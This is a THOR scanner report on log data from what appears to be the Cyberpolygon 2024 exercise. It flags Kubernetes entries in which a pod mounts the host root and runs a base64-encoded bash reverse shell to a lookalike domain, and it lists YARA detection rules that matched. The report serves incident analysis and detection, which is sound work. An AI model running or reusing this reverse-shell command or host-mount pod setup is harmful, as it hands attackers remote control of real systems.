No filters applied

THOR Scan Report

Scan Information
Scanner Thor
Version 10.7.9
Run on System WIN-LRTT94FA08M
Argument list --path D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024 --module filescan
Signature Database 2023/09/24-052825
Start Time Tue Sep 10 18:37:26 2024
End Time Tue Sep 10 18:47:10 2024
IP Addresses 10.100.5.12
Run as user WIN-LRTT94FA08M\Administrator
Admin rights yes
Platform Windows Server 2019 Standard
Log File Name WIN-LRTT94FA08M_thor_2024-09-10_1836.txt
False Positive Filters Applied 0
Scan ID S-SuOJqXNEdu8
Modules
LogScan 15
Statistics
Alerts 0
Warnings 12
Notice 6
Info 121
Errors 0
Help
Shortcuts Use Ctrl+⬆ (Windows/Linux) or ⌘+⬆ (macOS) to return to the top of the page
Filters You can provide a file (--filter file) with regular expressions to suppress false positives
Hint 1 Select text and use the context menu to filter / select / lookup strings
Hint 2 Click on a module to filter for all events from that module.
Errors
Alerts
Warnings
Warning 1
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
Warning 2
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
Warning 3
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"AoI_uJEBNKI3r7qcaSwz","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:21.961Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"191ab5a2-2575-4009-a93f-b458ac958b3e\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...],\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 4
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"34I_uJEBNKI3r7qckC81","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:35.965Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"e19bb517-20b7-4c99-8e9f-3daa35b7a341\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{\".\":{},\"f:mountPath\":{},\"f:name\":{}}}}},\
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 5
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"U4I_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3\", \"pid\":166517, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.426919025Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"tid\":166517}, \"pa[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]/fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":166480,"cwd":"/home/utils","start_t
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 6
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"VoI_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"pid\":166480, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.425980113Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2\", \"tid\":166480}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2N[...]4.118.57"]},"tags":["beats_input_codec_plain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:48.425980320Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","pid":166480,"cwd":"/home/utils","start_time":"2024-09-03T14:17:48.425980113Z","docker":"fdcd66e90be354011d42578ba2f1fd0","parent_exec_id":"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2","tid":166480,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","c
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 7
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"wYI_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2\", \"pid\":166516, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.428681947Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGU[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bin/base64","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 8
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"y4I_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:49.971Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"1a825c2c-71a2-45df-a947-32d1c33d6f9f\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"$setEleme[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]th\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"calico\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\"
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • iYXNoIC1pID4mIC9kZXYvdGNwL
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
  • 4mIC9kZXYvdGNwL
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators
Warning 9
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"x4I_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"pid\":164760, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.402209123Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"tid\":164760}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"pid\":164746, \"uid\":0, 